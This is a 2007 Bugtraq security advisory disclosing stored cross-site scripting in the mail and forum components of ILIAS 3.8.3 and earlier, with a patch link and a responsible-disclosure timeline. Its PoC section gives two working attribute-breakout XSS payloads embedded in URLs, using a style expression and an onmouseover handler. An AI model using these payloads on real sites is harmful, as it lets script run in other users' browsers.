ILIAS <= 3.8.3 Cross Site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ILIAS <= 3.8.3 Cross Site Scripting
- From: L4teral <l4teral@xxxxxxxxx>
- Date: Tue, 30 Oct 2007 22:14:33 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=40My3HzxnJZyNWDzRfgJUis4FBWpw9wkeK9fpw04NrA=; b=JPZ7s3vwHyI6IQomvmprcU+RoOBNB8i9di2mddmgDKrTP1tKVJhEroGIU7JA5mlTQb5h7SMF6zIyog4C7BQebnKfSCWgaS7eokpuvHSDX0u6GNdZ2yUwY/Ow404z3EqJyr2ejxfSnOdGDy0d28LeSmdzX2AsRoAaOtvHiBogHFU=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=QzQhVZE081VW0n2VJUeSc5jkSnjICPJYqOSESG6FZdSEKnr4KkOie0ODTUfbjvSzAw1/zSHIOXI+zhZFsnoRIEJFhV91TOHh6zE1BURV1hOukUdbS33ZXaZHk271/oQff5+xysa8DGRJwqFE0dfY/N7R9xaERTMpp6K7gfbapV4=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
======================================================================
ILIAS <= 3.8.3 Cross Site Scripting
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ILIAS
Version: <= 3.8.3
Vendor: http://www.ilias.de
Description:
ILIAS is a powerful web-based learning management system that allows
you to easily manage learning resources in an integrated system.
--------------
Vulnerability:
--------------
The mailing and forum components are vulnerable to cross site scripting.
------------
PoC/Exploit:
------------
create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com
http://www.ex"onmouseover="javascript:alert('xss');"ample.com
---------
Solution:
---------
install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&client_id=docu
---------
Timeline:
---------
17.10.2007 - vendor informed
25.10.2007 - vendor responded
29.10.2007 - vendor released patch
30.10.2007 - public disclosure